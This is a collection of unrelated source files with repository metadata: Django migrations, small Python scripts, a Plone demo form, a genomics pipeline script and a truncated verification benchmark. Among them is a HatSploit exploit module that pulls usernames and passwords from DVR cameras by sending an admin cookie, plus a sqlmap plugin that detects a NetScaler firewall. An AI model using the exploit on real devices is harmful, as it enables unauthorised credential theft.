"depends": ['base', 'delivery_extension', 'stock_picking_batch','stock','delivery'],
'data': [
'views/stock_view.xml',
'report/batch_picking_report.xml',
'report/batch_picking_report_views.xml',
'static/src/xml/batch_transfer_ruvati.xml'
],
'demo_xml': [],
'installable': True,
'application': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
[
"vinod@confianzit.biz"
] |
vinod@confianzit.biz
|
f58261daab0df0e28c03fbe345a6d2e337fdc477
|
45b159e64114d8759c0e2987bd0a6f02f60daf4d
|
/Python/APL/ch14/distanceThreeArrays.py
|
80483127107e3734d02efe667945abcd5ac19af1
|
[] |
no_license
|
afcarl/Coding_Interview_Problems
|
45b24b849a90581db5327811c5ab78237f4d5ac0
|
1256d4394d506aec875e9e19300404a9b32a4eb1
|
refs/heads/master
| 2020-03-16T20:16:54.706152
| 2015-02-11T05:51:56
| 2015-02-11T05:51:56
| 132,953,286
| 1
| 0
| null | 2018-05-10T20:54:14
| 2018-05-10T20:54:14
| null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
'''
Created on Jan 24, 2015
@author: Ben Athiwaratkun (pa338)
'''
#from __future__ import division
#import numpy as np
def findMin(A,B,C):
pass
def main():
A = [1,2,3]
B = [4,1,8]
C = [3,2,7]
findMin(A,B,C)
if __name__ == "__main__":
main()
|
[
"ben.athiwaratkun@gmail.com"
] |
ben.athiwaratkun@gmail.com
|
11689979f2e6aaa273058e3b89ba57a7a4d578c0
|
1fa265a01400c23f9ca494a1d9ef55b6cef85cdc
|
/inventory/migrations/0102_auto_20200131_1454.py
|
ac78634fc95dc9da549ec9a25ce03a0aaf6d0ca9
|
[] |
no_license
|
dipesh779/posbackend
|
523660b40be4d5deaff6b6c267c65fa9caba00de
|
06effb004448dbb6d99077790ceb4738875e6505
|
refs/heads/master
| 2022-04-25T09:15:12.081266
| 2020-05-04T04:45:56
| 2020-05-04T04:45:56
| 261,082,375
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,522
|
py
|
# Generated by Django 2.2.7 on 2020-01-31 09:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('inventory', '0101_auto_20200131_0911'),
]
operations = [
migrations.AlterField(
model_name='stockcomputation',
name='complimentory_sale',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='discrepancy_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='expired_quantity',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='final_closing_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='inspected_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='received_stock',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='sale',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='theoritical_QOH',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='threshold_quantity',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
migrations.AlterField(
model_name='stockcomputation',
name='weigh_price',
field=models.DecimalField(blank=True, decimal_places=2, default=0.0, max_digits=10, null=True),
),
]
|
[
"dipesh@perplexsolutions.com"
] |
dipesh@perplexsolutions.com
|
836dc051ae842d3fb098afe67dd219518fdf722b
|
2aa47f47fb81798afdf41437844cbbea8e9de66c
|
/02pythonBase/day12/day11_exercise/factorial_sum.py
|
d9c669a1112be4d4c20c74aede6742f36eab15e2
|
[] |
no_license
|
nykh2010/python_note
|
83f2eb8979f2fb25b4845faa313dbd6b90b36f40
|
5e7877c9f7bf29969072f05b98277ef3ba090969
|
refs/heads/master
| 2020-04-27T23:10:16.578094
| 2019-03-23T02:43:14
| 2019-03-23T02:43:14
| 174,765,151
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 299
|
py
|
# 3. 写程序算出 1 ~ 20 的阶乘的和
# 1! + 2! + 3! + 4! + ..... + 20!
# 方法1
# def myfac(n):
# if n == 1:
# return 1
# return n * myfac(n - 1)
# s = 0
# for x in range(1, 21):
# s += myfac(x)
# print(s)
import math
print(sum(map(math.factorial, range(1, 21))))
|
[
"xulingfeng@boe.com.cn"
] |
xulingfeng@boe.com.cn
|
ef7cfcbb15eaf35f6cd7f8058281eb80959721bb
|
40fc1d38f2d4b643bc99df347c4ff3a763ba65e3
|
/arcade/infiniworld/src/infiniworld/__init__.py
|
77165064cf85d6cbd506c2db160a29d5cf41a5cf
|
[] |
no_license
|
alecordev/pygaming
|
0be4b7a1c9e7922c63ce4cc369cd893bfef7b03c
|
35e479b703acf038f47c2151b3759ad852781e4c
|
refs/heads/master
| 2023-05-14T05:03:28.484678
| 2021-06-03T10:11:08
| 2021-06-03T10:11:08
| 372,768,733
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 317
|
py
|
"""The infiniworld package contains the entire game engine: Models Views and
Controllers, but also physics, geometry, time management, etc.
"""
from . import controllers
from . import events
from . import evtman
from . import geometry
from . import log
from . import models
from . import physics
from . import time_
|
[
"alecor.dev@gmail.com"
] |
alecor.dev@gmail.com
|
b81680590f118a2d347e1fb05c0986f14e401d1d
|
5d0edf31b17c5375faf6126c1a7be8e79bfe2ab8
|
/buildout-cache/eggs/plone.formwidget.contenttree-1.0.14-py2.7.egg/plone/formwidget/contenttree/demo.py
|
57b8a81802b37b1a271061de3b3b447da24627fd
|
[] |
no_license
|
renansfs/Plone_SP
|
27cba32ebd9fc03dae3941ec23cf1bf0a7b6667a
|
8a7bdbdb98c3f9fc1073c6061cd2d3a0ec80caf5
|
refs/heads/master
| 2021-01-15T15:32:43.138965
| 2016-08-24T15:30:19
| 2016-08-24T15:30:19
| 65,313,812
| 0
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,759
|
py
|
from zope.component import adapts
from zope.interface import Interface, implements
from zope import schema
from plone.z3cform import layout
from z3c.form import form, button, field
from plone.formwidget.contenttree import ContentTreeFieldWidget
from plone.formwidget.contenttree import MultiContentTreeFieldWidget
from plone.formwidget.contenttree import PathSourceBinder
class ITestForm(Interface):
buddy = schema.Choice(title=u"Buddy object",
description=u"Select one, please",
source=PathSourceBinder(portal_type='Document'))
friends = schema.List(
title=u"Friend objects",
description=u"Select as many as you want",
value_type=schema.Choice(
title=u"Selection",
source=PathSourceBinder(portal_type='Document')))
class TestAdapter(object):
implements(ITestForm)
adapts(Interface)
def __init__(self, context):
self.context = context
def _get_buddy(self):
return None
def _set_buddy(self, value):
print "setting", value
buddy = property(_get_buddy, _set_buddy)
def _get_friends(self):
return []
def _set_friends(self, value):
print "setting", value
friends = property(_get_friends, _set_friends)
class TestForm(form.Form):
fields = field.Fields(ITestForm)
fields['buddy'].widgetFactory = ContentTreeFieldWidget
fields['friends'].widgetFactory = MultiContentTreeFieldWidget
# To check display mode still works, uncomment this and hit refresh.
#mode = 'display'
@button.buttonAndHandler(u'Ok')
def handle_ok(self, action):
data, errors = self.extractData()
print data, errors
TestView = layout.wrap_form(TestForm)
|
[
"renansfs@gmail.com"
] |
renansfs@gmail.com
|
2d3850df0c094eeb7f706d70aa509e5e2011f721
|
772b0df2635b95644ea3eb370103174804024167
|
/scripts/process_file.py
|
cfce2bb5b07aee825c3a76f0632392eb3a6e3579
|
[
"MIT"
] |
permissive
|
4dn-dcic/clodius
|
ec909bda90a9df13fa1b85472951f6cf149213a5
|
aa31b3d90a5a9fec883c20cab31ad4d347cd52cd
|
refs/heads/develop
| 2020-04-17T23:31:32.114043
| 2019-04-02T14:01:46
| 2019-04-02T14:01:46
| 167,038,915
| 0
| 0
|
MIT
| 2019-03-28T20:10:46
| 2019-01-22T17:43:32
|
Python
|
UTF-8
|
Python
| false
| false
| 2,597
|
py
|
from __future__ import print_function
import argparse
import os.path as op
import subprocess as sp
import sys
import tempfile as tf
def main():
usage = """
python make_tiles.py input_file
Create tiles for all of the entries in the JSON file.
"""
parser = argparse.ArgumentParser()
parser.add_argument('filepath')
parser.add_argument('-a', '--assembly', default='hg19')
parser.add_argument('-t', '--type', default='bedgraph')
parser.add_argument('--stdout', default=False, action='store_true',
help="Dump output to stdout (not implemented yet)")
args = parser.parse_args()
filedir = op.dirname(args.filepath)
outfile = open(args.filepath + '.genome.sorted.gz', 'w')
tempfile = tf.TemporaryFile('w+b')
if args.type == 'bigwig':
tempfile1 = tf.TemporaryFile()
p05 = sp.Popen(['bigWigToBedGraph', args.filepath, '/dev/fd/1'],
stdout = tempfile1)
p05.wait()
tempfile1.seek(0)
p0 = sp.Popen(['pv', '-f', '-'],
stdin=tempfile1,
stdout=sp.PIPE,
stderr=sp.PIPE,
universal_newlines=True)
pn = p0
elif args.type == 'bedgraph':
p0 = sp.Popen(['pv', '-f', args.filepath],
stdout=sp.PIPE,
stderr=sp.PIPE,
universal_newlines=True)
pn = p0
p1 = sp.Popen(["awk", "{print $1, $2, $1, $3, $4 }"],
stdin = pn.stdout,
stdout=sp.PIPE)
p2 = sp.Popen(['chr_pos_to_genome_pos.py', '-e 5', '-a', '{}'.format(args.assembly)],
stdin = p1.stdout,
stdout=sp.PIPE)
p3 = sp.Popen(['sort', '-k1,1n', '-k2,2n', '-'],
stdin = p2.stdout,
stdout=tempfile)
for line in iter(p0.stderr.readline, ""):
print("line:", line.strip())
p0.wait()
p1.wait()
p2.wait()
p3.wait()
tempfile.flush()
print("tell:", tempfile.tell())
tempfile.seek(0)
p35 = sp.Popen(['pv', '-f', '-'],
stdin = tempfile,
stdout = sp.PIPE,
stderr = sp.PIPE,
universal_newlines=True)
p4 = sp.Popen(['gzip'],
stdin = p35.stdout, stdout=outfile)
for line in iter(p35.stderr.readline, ""):
print("line:", line.strip())
p35.wait()
p4.wait()
print("filedir:", filedir)
if __name__ == '__main__':
main()
|
[
"pkerpedjiev@gmail.com"
] |
pkerpedjiev@gmail.com
|
512c1fce60003522e98e0f5f3d8278c65001a88e
|
437428a48278b4e9bc04e1b8acbb33199f409376
|
/modules/exploit/unix/dvr/camera_credentials_disclosure.py
|
563adb10d9ee37945d96f06681ce86ece688b976
|
[
"MIT"
] |
permissive
|
happylaodu/HatSploit
|
06d18ba2590456241ba61273d9f3d662a8bb26ec
|
9d53f3db85ce38483c6e7d16570ac233c5dd93cf
|
refs/heads/main
| 2023-04-30T20:18:37.090185
| 2021-06-02T20:23:08
| 2021-06-02T20:23:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,120
|
py
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
from core.lib.module import Module
from utils.http.http import HTTPClient
class HatSploitModule(Module, HTTPClient):
details = {
'Name': "DVR Camera Credentials Disclosure",
'Module': "exploit/unix/dvr/camera_credentials_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080)',
'ezelf'
],
'Description': "DVR Camera credentials disclosure.",
'Comments': [
''
],
'Platform': "unix",
'Risk': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
}
}
def exploit(self, remote_host, remote_port):
self.output_process("Generating payload...")
cookies = {
"uid": "admin"
}
payload = '/device.rsp?opt=user&cmd=list'
self.output_process("Sending payload...")
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
cookies=cookies
)
if response is None or response.status_code != 200:
self.output_error("Failed to send payload!")
return
try:
json_data = json.loads(response.text)
for data in json_data["list"]:
credentials.append((data["uid"], data["pwd"], data["role"]))
self.print_table("Credentials", ('Username', 'Password', 'Role'), *credentials)
except Exception:
self.output_error("Credentials could not be found!")
def run(self):
remote_host, remote_port = self.parse_options(self.options)
self.output_process(f"Exploiting {remote_host}...")
self.exploit(remote_host, remote_port)
|
[
"enty8080@gmail.com"
] |
enty8080@gmail.com
|
84cb538f8850e3ffa7072e85d2b0228a7d713a47
|
356f3f1b7caf0ccb20cc830d40821dfb2cbda046
|
/sfit/workout/doctype/workout_day/test_workout_day.py
|
8696ffbb32d632dbc281ece67008a9e16deb779d
|
[
"MIT"
] |
permissive
|
vignesharumainayagam/sfit
|
f4b75b9a8b2de08d0eaa4eadbcd3d5e432ffba56
|
a96afbf35b0e1635e44cb5f83d7f86c83abedb8f
|
refs/heads/master
| 2021-09-05T18:22:43.494208
| 2018-01-30T07:23:02
| 2018-01-30T07:23:02
| 104,332,803
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 216
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Valiant Systems and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestWorkoutDay(unittest.TestCase):
pass
|
[
"vigneshwaran@valiantsystems.com"
] |
vigneshwaran@valiantsystems.com
|
1f3e82b1570f82ea3bdfef2515882a87a08ed13e
|
8efe9a6c9489d798b5f5b610eb531d86924a1548
|
/src/products/migrations/0030_auto_20180305_0204.py
|
5a7d07b9df8306b0e3108784bcba1e778c6e7200
|
[] |
no_license
|
MarekBiczysko/naklisze_public
|
e8e6f7e61cdb83b74ea68862b40c061c0253767b
|
e53c0e8fefffbcfc3a8859976eb7b81cf6270847
|
refs/heads/master
| 2022-12-12T02:27:09.824803
| 2019-07-23T10:54:47
| 2019-07-23T10:54:47
| 198,410,666
| 0
| 0
| null | 2022-12-08T01:03:08
| 2019-07-23T10:46:57
|
Python
|
UTF-8
|
Python
| false
| false
| 1,518
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-05 01:04
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('products', '0029_auto_20180305_0150'),
]
operations = [
migrations.AlterField(
model_name='camera',
name='description',
field=models.TextField(default='\nA camera is an optical instrument for recording or capturing images, which may be stored locally, transmitted to another location, or both. The images may be individual still photographs or sequences of images constituting videos or movies. The camera is a remote sensing device as it senses subjects without any contact . The word camera comes from camera obscura, which means "dark chamber" and is the Latin name of the original device for projecting an image of external reality onto a flat surface. The modern photographic camera evolved from the camera obscura. The functioning of the camera is very similar to the functioning of the human eye. The first permanent photograph of a camera image was made in 1826 by Joseph Nicéphore Niépce.\n'),
),
migrations.AlterField(
model_name='camera',
name='spec_table',
field=models.TextField(blank=True, default="\nogniskowa @ 58 mm &\nkąt widzenia @ 32' szerokości &\nparametr @ wartość &\nkolejny parametr @ następna wartość &\n", max_length=300, null=True),
),
]
|
[
"marek.biczysko@stxnext.pl"
] |
marek.biczysko@stxnext.pl
|
edb41ced91b448c477e1ff798421c4a836d02c1c
|
971e0efcc68b8f7cfb1040c38008426f7bcf9d2e
|
/tests/artificial/transf_None/trend_Lag1Trend/cycle_5/ar_/test_artificial_128_None_Lag1Trend_5__0.py
|
a2712b0471685b35c3361d00197c36c4f8dea080
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
antoinecarme/pyaf
|
a105d172c2e7544f8d580d75f28b751351dd83b6
|
b12db77cb3fa9292e774b2b33db8ce732647c35e
|
refs/heads/master
| 2023-09-01T09:30:59.967219
| 2023-07-28T20:15:53
| 2023-07-28T20:15:53
| 70,790,978
| 457
| 77
|
BSD-3-Clause
| 2023-03-08T21:45:40
| 2016-10-13T09:30:30
|
Python
|
UTF-8
|
Python
| false
| false
| 258
|
py
|
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 5, transform = "None", sigma = 0.0, exog_count = 0, ar_order = 0);
|
[
"antoine.carme@laposte.net"
] |
antoine.carme@laposte.net
|
5afe09e31c7ddd461bd0ca9ead432738d103c647
|
148072ce210ca4754ea4a37d83057e2cf2fdc5a1
|
/src/core/w3af/w3af/plugins/attack/db/sqlmap/waf/netscaler.py
|
04b6d4eca5614726a9e6be0a151109dfc48cf07b
|
[] |
no_license
|
ycc1746582381/webfuzzer
|
8d42fceb55c8682d6c18416b8e7b23f5e430c45f
|
0d9aa35c3218dc58f81c429cae0196e4c8b7d51b
|
refs/heads/master
| 2021-06-14T18:46:59.470232
| 2017-03-14T08:49:27
| 2017-03-14T08:49:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 812
|
py
|
#!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
from lib.core.enums import HTTP_HEADER
from lib.core.settings import WAF_ATTACK_VECTORS
__product__ = "NetScaler (Citrix Systems)"
def detect(get_page):
retval = False
for vector in WAF_ATTACK_VECTORS:
page, headers, code = get_page(get=vector)
retval = re.search(r"\Aclose", headers.get("Cneonction", "") or headers.get("nnCoection", ""), re.I) is not None
retval = re.search(r"\A(ns_af=|citrix_ns_id|NSC_)", headers.get(HTTP_HEADER.SET_COOKIE, ""), re.I) is not None
retval |= re.search(r"\ANS-CACHE", headers.get(HTTP_HEADER.VIA, ""), re.I) is not None
if retval:
break
return retval
|
[
"everping@outlook.com"
] |
everping@outlook.com
|
c62bf5e407c19bc1d3059d7e8ee9abbaba6d7100
|
eb74806869a4340a6d8a2623bbe72bd4e64dcde8
|
/apps/rss_feeds/migrations/0006_feed_fs_size_bytes.py
|
cebc86363ae3a0e11564538d0d6f2f78ab934930
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
sictiru/NewsBlur
|
a0874a1044926d2268ba07a928e62fce5c9a8310
|
1ab88e4cc34775d00a1ac90ee08bc2498577e773
|
refs/heads/sictiru
| 2023-08-19T20:24:20.638019
| 2023-08-15T03:52:09
| 2023-08-15T03:52:09
| 250,445,213
| 1
| 0
|
MIT
| 2023-03-06T15:34:38
| 2020-03-27T05:05:44
|
Objective-C
|
UTF-8
|
Python
| false
| false
| 409
|
py
|
# Generated by Django 3.1.10 on 2022-05-11 17:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rss_feeds', '0005_feed_archive_subscribers'),
]
operations = [
migrations.AddField(
model_name='feed',
name='fs_size_bytes',
field=models.IntegerField(blank=True, null=True),
),
]
|
[
"samuel@ofbrooklyn.com"
] |
samuel@ofbrooklyn.com
|
3b30a770bc9971f15e4f4a4cd43afbcdce5c6da2
|
cc9cf69b1534dc0d9530b4ff485084162a404e34
|
/leetcode/pass/leetcode_90.py
|
74fc6a05142615a6ecb6b64f80b6893234b2b510
|
[] |
no_license
|
NASA2333/study
|
99a58b2c9979201e9a4fae0c797391a538de6f45
|
ba63bc18f3c788090e43406315497329b00ec0a5
|
refs/heads/master
| 2021-05-03T22:26:52.541760
| 2018-02-07T02:24:55
| 2018-02-07T02:24:55
| 104,988,265
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 615
|
py
|
'''
Given a collection of integers that might contain duplicates, nums, return all possible subsets (the power set).
Note: The solution set must not contain duplicate subsets.
For example,
If nums = [1,2,2], a solution is:
[
[2],
[1],
[1,2,2],
[2,2],
[1,2],
[]
]
'''
from itertools import permutations
l =[]
def subsetsWithDup(s):
for i in range(len(s)+1):
l.append(list(permutations(s,i)))
for i in l[1:]:
l[0].extend(i)
l2 = [sorted(list(i)) for i in l[0]]
for i in range(len(l2)):
if l2[i] in l2[i+1:]:
l2[i] ="*"
return [i for i in l2 if i !='*']
print(subsetsWithDup([1,2,2]))
|
[
"422282539@qq.com"
] |
422282539@qq.com
|
8261febe86d08207fffb746dc4ea9b8bb4edf2f7
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/128/usersdata/195/33234/submittedfiles/al6.py
|
a43d19a9835509d9bcff514428b8a373c0912704
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
# -*- coding: utf-8 -*-
n=int(input('digite n:'))
contador=0
i=2
while i<=n:
if n%i==0:
contador=contador+1
print(i)
i=i+1
if contador==0:
print('PRIMO')
else:
print('NÃO PRIMO')
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
a7331b3ee43605f606716e225b6f3a8427eb2df6
|
4ae7cdc9292009398a292bdf6bee61428559fdfd
|
/SourceCodeTools/mltools/torch/__init__.py
|
3cf41a14372e44768224cab38988ebb371ea39dc
|
[] |
no_license
|
VitalyRomanov/method-embedding
|
52a4e6e7bf726b4db0872902a0eaf1d8cb82b4a8
|
1c8f0fc04eb1f495555272d9747fd2fea68525e1
|
refs/heads/master
| 2023-08-31T17:39:04.051912
| 2023-01-08T05:02:52
| 2023-01-08T05:02:52
| 219,153,628
| 5
| 7
| null | 2023-07-22T20:27:20
| 2019-11-02T12:54:12
|
Python
|
UTF-8
|
Python
| false
| false
| 308
|
py
|
import torch
def compute_accuracy(pred_, true_):
return torch.sum(pred_ == true_).item() / len(true_)
def to_numpy(tensor):
return tensor.cpu().detach().numpy()
def get_length_mask(target, lens):
mask = torch.arange(target.size(1)).to(target.device)[None, :] < lens[:, None]
return mask
|
[
"mortiv16@gmail.com"
] |
mortiv16@gmail.com
|
759b4b822b6a931f35052cc8ae753ec5e73d26ef
|
fab14fae2b494068aa793901d76464afb965df7e
|
/benchmarks/f3_wrong_hints/scaling_nonlinear_software/3-19_35.py
|
57bc6dce8fac1bc637a307a76bce16e0d73a5015
|
[
"MIT"
] |
permissive
|
teodorov/F3
|
673f6f9ccc25acdfdecbfc180f439253474ba250
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
refs/heads/master
| 2023-08-04T17:37:38.771863
| 2021-09-16T07:38:28
| 2021-09-16T07:38:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,903
|
py
|
from typing import FrozenSet, Tuple
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
symbols = frozenset([pc, x, y, z])
n_locs = 5
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
for l in range(n_locs):
n = ints[l]
pcs.append(mgr.Equals(pc, n))
x_pcs.append(mgr.Equals(x_pc, n))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(y >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(y, ints[1]))), x_pcend),
# pc = 0 & y >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(y, ints[1])), x_pcs[1]),
# pc = 1 & !(z >= 1) : -1,
mgr.Implies(mgr.And(pcs[1], mgr.Not(mgr.GE(z, ints[1]))), x_pcend),
# pc = 1 & z >= 1 : 2,
mgr.Implies(mgr.And(pcs[1], mgr.GE(z, ints[1])), x_pcs[2]),
# pc = 2 & !(x >= 0) : -1,
mgr.Implies(mgr.And(pcs[2], mgr.Not(mgr.GE(x, ints[0]))), x_pcend),
# pc = 2 & x >= 0 : 3,
mgr.Implies(mgr.And(pcs[2], mgr.GE(x, ints[0])), x_pcs[3]),
# pc = 3 : 4,
mgr.Implies(pcs[3], x_pcs[4]),
# pc = 4 : 2,
mgr.Implies(pcs[4], x_pcs[2]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 0 & pc' = 1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 1 & pc' = 2) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = -1) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcend),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 2 & pc' = 3) -> (x' = x & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, y),
mgr.Equals(x_z, z))),
# (pc = 3 & pc' = 4) -> (x' = y*z - 1 & y' = y & z' = z),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_x, mgr.Minus(mgr.Times(y, z), ints[1])),
mgr.Equals(x_y, y), mgr.Equals(x_z, z))),
# (pc = 4 & pc' = 2) -> (x' = x & y' = y+1 & z' = z),
mgr.Implies(
mgr.And(pcs[4], x_pcs[2]),
mgr.And(mgr.Equals(x_x, x), mgr.Equals(x_y, mgr.Plus(y, ints[1])),
mgr.Equals(x_z, z))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
z = mgr.Symbol("z", types.INT)
symbs = frozenset([pc, x, y, z])
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
x_z = symb_to_next(mgr, z)
res = []
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_3 = mgr.Int(3)
loc0 = Location(env, mgr.GT(x, i_3), mgr.And(mgr.GT(y, i_1), mgr.GT(z, i_1)))
loc0.set_progress(1, mgr.GE(x_x, mgr.Minus(mgr.Times(y, z), i_1)))
loc1 = Location(env, mgr.GT(x, i_0), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.Equals(x_x, mgr.Plus(x, y)))
loc2 = Location(env, mgr.GT(x, i_3))
loc2.set_progress(2, mgr.Equals(x_x, x))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
loc0 = Location(env, mgr.GE(z, i_0))
loc0.set_progress(1, mgr.Equals(x_z, z))
loc1 = Location(env, mgr.GE(z, i_0))
loc1.set_progress(0, mgr.Equals(x_z, mgr.Plus(z, i_3)))
h_z = Hint("h_z4", env, frozenset([z]), symbs)
h_z.set_locs([loc0, loc1])
res.append(h_z)
loc0 = Location(env, mgr.Equals(pc, i_2))
loc0.set_progress(1, mgr.GT(x_pc, i_2))
loc1 = Location(env, mgr.GE(pc, i_3))
loc1.set_progress(2, mgr.GE(x_pc, i_3))
loc2 = Location(env, mgr.GE(pc, i_3))
loc2.set_progress(0, mgr.Equals(x_pc, i_2))
